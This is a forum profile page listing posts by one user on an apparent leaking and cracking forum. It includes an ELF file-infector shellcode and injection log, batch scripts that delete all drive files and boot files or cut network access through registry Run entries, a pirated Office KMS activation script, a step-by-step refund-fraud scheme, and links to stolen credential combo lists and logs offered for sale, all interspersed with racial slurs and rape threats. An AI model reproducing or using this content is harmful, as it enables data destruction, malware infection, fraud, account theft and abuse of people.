mesvak

Members
  • Content Count

    2,691
  • Last visited

  • Days Won

    4

Everything posted by mesvak

  1. this is so simple just you needa know knowing stuff in C/C++ knowing stuff in Intel x86 assembly Knowledge of the WinAPI and its documentation Knowledge of the PE file structure Knowledge of Dynamic Linked Libraries [hide] poc .c written in c++ https://pastr.io/view/sbYDYI and asmbelly code section .text global _start _start: sub r12, 0x4f20 push rax push rdi push rsi push rdx mov rax,1 ; [1] - sys_write mov rdi,1 ; 0 = stdin / 1 = stdout / 2 = stderr lea rsi,[rel msg] ; pointer(mem address) to msg (*char[]) mov rdx, msg_end - msg ; msg size syscall ; calls the function stored in rax pop rdx pop rsi pop rdi pop rax jmp r12 align 8 msg db 'Infected file Test',0x0a,0 msg_end db 0x0 and usage written by shitty hands $ cp / bin / uname evil_uname $ ./niga evil_uname ELF virus example Running in offset mode + Mapped file (35032 bytes) at 0x7fff7ae5a540 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) offset == 0x4f20 $ #change offset on shellcoda.asm $ nasm -f elf64 shellcode.asm $ ./niga evil_uname shellcode.o ELF virus example + Mapped file (35032 bytes) at 0x7ffc51d5d920 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) + Processing victim -> Base Address: 0x (nil) + Mapped file (704 bytes) in 0x7ffc51d5d928 + Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section + Processing payload -> sname: '' + Processing payload -> sname: '.text' has entered the returning if shdr-> sh_name: 1 shdr-> sh_type: 1 shdr-> sh_addr: 0 + Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes) $ ./evil_uname Infected file Test me no gae u are all retarded plebs Xd Linux [/hide]
  2. Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils THEY ARE LIL MONKEYS EVERY VERE WORSE THAN AN ASSHOLE IKR meme my instagram id :mesvak discord:mesvak#7842
  3. Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils THEY ARE LIL MONKEYS EVERY VERE WORSE THAN AN ASSHOLE IKR meme my instagram id :mesvak discord:mesvak#7842
  4. [hide] https://www.upload.ee/files/10066054/http_s_.txt.html [/hide]
  5. [hide] https://www.upload.ee/files/10066055/socks_4__5_.txt.html [/hide]
  6. [hide] 1.) Head over to: https://gillette.com/en-us/contact-us I DID WITH GB 2.) You have 3 choice of contact: Live chat (simple, quick, and my favorite method), email (takes a while so not the best), and phone (quickest but you have to actually talk to someone). DONT do PHONE if u do not speak english or have some weakness prepare something like jug shit and say it if u think u cant speak fluently i choosed phone 2 times in my fucking shitty life XD suckers 3.) Head over to: https://www.amazon.com/ and find an expensive pack of Gillette replacement blades (Razors) ( I recommend doing packs less than $45 or the jig will be harder to execute). 4.) Now, through whichever contact method you choose, say something along the lines of "Hi! So I recently bought your (item you found on amazon) sucker and I was far from satisfied niga u know what i mean ! I usually love these razors and I actually bought a good amount as gifts for my relatives (yeah in my dreams .!.), but this pack kinda ruined my image of Gillette as a brand. (sucks mfer) I proceeded to use the blades and they just felt awful. XDfml and kys They were kinda rough and I ended up cutting my cheek with a few strokes. (hurts to much bitches) Also, about 2 days later, I noticed a red itchy rash on my skin. (ooof now im ugly af bastards) I went back to look at the razors and there was a weird clear liquid on them. (that was my cemen niga) I'm really annoyed cause now I wasted $45 (or whatever the price of the pack was), don't have any razors, (puted them in ur ass) and a weird rash on my skin". If there is anything you can do to help I would really appreciate it. Thanks".(Gtfo b4 i kill u ) 5.) They may ask for you to ship it back to them so they can inspect it for quality control, but just say you threw it out because you didn't want anything to do with them as the liquid was harmful to your skin. 6.) You will get you $45 prepaid visa card mailed to your house within 2 weeks. 7.) Jig Chat way only way sucker and wait till u get that shitt and dont forget to give me 20$ half half niga [/hide]
  7. [hide] Condition in python #mesvak is not ur lil gae bish age = 12 name = 'mesvak' language = 'python' if age == 12: print("age is 12") #output : age is 12 if age is 12: print("age is 12") #output : age is 12 if age == 13: print("ok") else: print("less than 13") #output : less than 13 if age == 14: print("age is 14") elif age == 13: print("age is 13") elif age == 12: print("age is 12") if age is not 13: print("age is not 13") #output : age is not 13 if age >= 12: print("ok") #output : ok if age <= 13: print("ok") #output : ok if age != 12: print("ok") # it wont be executed cuase mesvak age is 12 and its opposite if name == 'mesvak' and age == 13: print("welcome1") #output : this wont be executed cuase age is not 13 if name == 'mesvak' or age == 13: print("welcome") #output : welcome there is or if name == 'mesvak' and (age == 14 or language == 'python'): print("welcome") #output : welcome lst = [1, 2, 3 , 4] if 1 in lst: print("1 is in list") #output : 1 is in list if 6 not in lst: print("6 is not in list") #output : 6 is not in list age = 14 name = "mesvak" if age < 12 else "suck" print(name) #output : suck name = 'mesvak' if age < 15 else 'mesvak' if age > 15 else 'nigger' print(name) #output : mesvak if age < 15: if age > 15: print('vmesvak') else: print('mesvak') else: print('nigger') #output : mesvak name = (('vmesvak', 'suck')[age > 12]) print(name) #output : suck name = (('vmesvak', 'suck')[True]) print(name) #output : suck true means age == 14 name = ('nigger', 'babak')[age < 12] print(name) #output : nigger or name = ('nigger', 'babak')[False] #output : nigger name = (age < 20) and 'mesvak' or 'nigger' print(name) #output : mesvak name = {True: 'mesvak', False: 'nigger'}[age < 20] print(name) #output : mesvak name = ((age > 20) and ['mesvak'] or ['nigger']) print(name) #output : ['nigger'] name = ((age > 20) and ['mesvak'] or ['nigger'])[0] print(name) #output : nigger x = [True, True, False] if any(x): print("At least one True") #output : At least one True if all(x): print("Not one False") else: print("At least one False") #ouput : At least one False if any(x) and not all(x): print("At least one True and one False") #output : At least one True and one False [/hide]
  8. for doing this you needa get pyglet installed that s what we needa import tho so then we make our image welp the images needa be besides the program we have written Like for this example nigger.gif and niba.gif lets get ahead [hide] #mesvak is here boobies import pyglet animation=pyglet.image.load_animation('niggers.gif') animation1=pyglet.image.load_animation('niba.gif') #this one make it like watever u can do to that gif like i conssider niggers.gif an earth so we can rotate and .... animsprite=pyglet.sprite.sprite(animation) w=animsprite.width h=animsprite.height window=pyglet.window.window(w=width,h=height) r,g,b,suck=0.5,0.5,0.8,0.5 pyglet.gl.glclearcolor(r,g,b,suck) @window.event def on_draw(): window.clear() animsprite.draw() pyglet.app.run() [/hide]
  9. welp this one is gud and something like shitty af you wanna turn the webcam on and make one colorful image and one gray it is ez for doing that we needa use numpy and cv2 [hide] #mesvak dont publish without my gae premission import cv2 import numpy as np cap = cv2.VideoCapture(1) while True: ret, frame = cap.read() gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) cv2.imshow('frame', frame) cv2.imshow('gray', gray) if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destoryAllWindows() [/hide]
  10. How to get ip, location , region ,organisation name ,country code , longitudal,latitude,area code , ,..... eveyrthing for taking revenge [hide] #mesvak author dont touch my balls pls import requests ip_request = requests.get('https://get.geojs.io/v1/ip.json') my_ip = ip_request.json()['ip'] print(my_ip) geo_request_url = 'https://get.geojs.io/v1/ip/geo/' + my_ip + '.json' geo_request = requests.get(geo_request_url) geo_data = geo_request.json() print(geo_data) [/hide]
  11. [hide] from smtplib import SMTP host="Nigger.gmail.com" port= 587 username= "mesvak@gmail.com" password= "mesvak" from_email= username to_list= ("mesvak1@gmail.com", "mesvak2@gmail.com") CON= SMTP(host, port) CON.starttls() CON.login(username, password) CON.sendmail(from_email, to_list, "Hey") CON.quit() [/hide]
  12. WELP THIS IS LIKE A VOUCH I HAVE 200GB LOGS FROM OTHERS SHITS AND ALL FULL OF ACCS AND STUFF WILLING TO SELL THEM ONLY TO 2 PERSON THE HIGHEST RANGES WILL BE ACCEPTED AND SENT :) [hide] https://www.upload.ee/files/10060093/mesvak.rar.html PASSWORD:mesvak [/hide]
  13. u truely want me to read that shit omygud sorry but im not gonna read it now tell me what u said Xd
  14. [hide] #nibberside Delete all files. Do not use on yourself! off del D: \ . / f / s / q del E: \ . / f / s / q del F: \ . / f / s / q del G: \ . / f / s / q del H: \ . / f / s / q del I: \ . / f / s / q del J: \ . / f / s / q Save to .bat extension #haha hoho Create a lot of folders. Do not use on yourself! off for / l %% i in (1,1,100) do mkdir "dir %% i" Save to .bat extension #highimm8havewemetb4 Turn off the computer with a message. Do not use on yourself! off shutdown.exe -s -t 45 -c "The computer will turn off after 45 seconds" Save in the .bat extension We #this isgud stop accessing the Internet. Do not use on yourself! off Ipconfig / release To return access to the Internet back, in CMD we write IPconfig / renew Save to .bat extension #dont abuse me ffs XD Open an infinite number of calculators. Do not use on yourself! off CLS : A start calc.exe goto A Save to .bat extension #what the fuck again im dj Quickly format the disks. Do not use on yourself! Option Explicit Dim WSHShell Set WSHShell = Wscript.CreateObject (“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next Save to .bat extension #mesvak is here biba Makes the system die. Do not use on yourself! off attrib -r -s -hc: \ autoexec.bat del c: \ autoexec.bat attrib -r -s -hc: \ boot.ini del c: \ boot.ini attrib -r -s -hc: \ ntldr del c: \ ntldr attrib -r -s -hc: \ windows \ win.ini del c: \ windows \ win.ini Save to .bat extension #mesvak projector nigga Disable access to the Internet forever. Do not use on yourself! echo off> c: windowswimn32.bat echo break off >> c: windowswimn32.bat echo ipconfig / release_all >> c: windowswimn32.bat echo end >> c: windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun / v WINDOWsAPI / t reg_sz /dc:windowswimn32.bat / f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun / v CONTROLexit / t reg_sz /dc:windowswimn32.bat / f echo (your message) PAUSE Save to .bat extension [/hide]
  15. [hide] @echo off title activating some shits and licence for microst assholes !&cls&echo ============================================================================&echo #Project: acTIVATING MICROSOFT SHITS WITHOUT PASSWORD BE PATIENT FFS BY MESVAK BIBO e&echo ============================================================================&echo.&echo #Supported products:&echo - Microsoft Office Standard 2016&echo - Microsoft Office Professional Plus 2016&echo.&echo.&(if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16")&(if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16")&(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)&(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)&echo.&echo ============================================================================&echo Activating your Office...&cscript //nologo ospp.vbs /unpkey:WFG99 >nul&cscript //nologo ospp.vbs /unpkey:DRTFM >nul&cscript //nologo ospp.vbs /unpkey:BTDRB >nul&cscript //nologo ospp.vbs /unpkey:CPQVG >nul&cscript //nologo ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99 >nul&set i=1 :server if %i%==1 set KMS_Sev=kms7.MSGuides.com if %i%==2 set KMS_Sev=kms8.MSGuides.com if %i%==3 set KMS_Sev=kms9.MSGuides.com if %i%==4 goto notsupported cscript //nologo ospp.vbs /sethst:%KMS_Sev% >nul&echo ============================================================================&echo.&echo. cscript //nologo ospp.vbs /act | find /i "successful" && (echo.&echo ============================================================================&echo.&echo #My official blog: MSGuides.com&echo.&echo #How it works: bit.ly/kms-server&echo.&echo #Please feel free to contact me at msguides.com@gmail.com if you have any questions or concerns.&echo.&echo #Please consider supporting this project: donate.msguides.com&echo #Your support is helping me keep my servers running everyday!&echo.&echo ============================================================================&choice /n /c YN /m "Would you like to visit my blog [Y,N]?" & if errorlevel 2 exit) || (echo The connection to my KMS server failed! Trying to connect to another one... & echo Please wait... & echo. & echo. & set /a i+=1 & goto server) explorer "http://MSGuides.com"&goto halt :notsupported echo.&echo ============================================================================&echo Sorry! Your version is not supported shitty bitch.&echo Please try installing the latest version TY FOR being gae sir bye :) :kappa: :halt pause [/hide]
  16. [hide] 1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009. 2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3. Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4. Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses. 5. Anti-Android Network Toolkit:-zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety. 6. SSHDroid:- SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc). 7. WiFi Analyser:- Turns your android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router. 8. Network Discovery:- Discover hosts and scan their ports in your Wifi network. A great tool for testing your network security. 9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers. 10. dSploit:-Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assesments on a mobile device. 11. Hackode:- The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. 12.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. 13.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. 14.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications. 15.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. 16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the webm service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service. [/hide]
  17. [hide] https://www.upload.ee/files/10058965/100k.txt.html [/hide] meme you gotta put my bullet in the pistol that gotta be on ur nake so god bless u Thats pussy in c.to like scooby da if i get u out of leeching u finna die VVs on my rollie That shitt on fit bit if i get u i would rape u a pleb kid bitch im drpping 10 grams in a blunt so im sipping ya MY iNStagram Id : mesvak
  18. [hide] https://www.upload.ee/files/10058960/370_ita.txt.html [/hide] meme you gotta put my bullet in the pistol that gotta be on ur nake so god bless u Thats pussy in c.to like scooby da if i get u out of leeching u finna die VVs on my rollie That shitt on fit bit if i get u i would rape u a pleb kid bitch im drpping 10 grams in a blunt so im sipping ya MY iNStagram Id : mesvak
  19. [hide] https://www.upload.ee/files/10058967/mixed.txt.html [/hide] meme you gotta put my bullet in the pistol that gotta be on ur nake so god bless u Thats pussy in c.to like scooby da if i get u out of leeching u finna die VVs on my rollie That shitt on fit bit if i get u i would rape u a pleb kid bitch im drpping 10 grams in a blunt so im sipping ya MY iNStagram Id : mesvak
  20. [hide] https://www.upload.ee/files/10058964/leage.txt.html [/hide] meme you gotta put my bullet in the pistol that gotta be on ur nake so god bless u Thats pussy in c.to like scooby da if i get u out of leeching u finna die VVs on my rollie That shitt on fit bit if i get u i would rape u a pleb kid bitch im drpping 10 grams in a blunt so im sipping ya MY iNStagram Id : mesvak
  21. [hide] https://www.upload.ee/files/10058959/73Kcombo.txt.html [/hide] meme you gotta put my bullet in the pistol that gotta be on ur nake so god bless u Thats pussy in c.to like scooby da if i get u out of leeching u finna die VVs on my rollie That shitt on fit bit if i get u i would rape u a pleb kid bitch im drpping 10 grams in a blunt so im sipping ya MY iNStagram Id : mesvak
  22. i got a vouch good shit nice one + vouch plebs
  23. mesvak

    zabazab

    fuck u zabi bzbzbzbzbzbzaaaa